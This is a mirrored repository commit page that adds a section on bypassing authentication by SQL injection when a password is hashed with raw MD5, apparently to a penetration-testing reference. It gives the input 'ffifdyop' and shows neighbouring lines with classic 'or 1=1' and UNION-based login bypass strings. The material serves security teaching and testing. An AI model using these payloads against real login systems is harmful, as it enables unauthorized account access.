gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-08 11:20:41 -08:00
Code Issues Packages Projects Releases Wiki Activity

Raw MD5 SQL injection + SSH Konami Code

Browse Source
This commit is contained in:
Swissky
2018-09-10 23:12:29 +02:00
parent 2a080f82e6
commit 7a80647e63
2 changed files with 25 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
SQL injection/README.md
View File

@@ -293,6 +293,22 @@ admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
## Authentication Bypass (Raw MD5)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6<EFBFBD>]<EFBFBD><EFBFBD>!r,<EFBFBD><EFBFBD>b
```
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
## Polyglot injection (multicontext)
```sql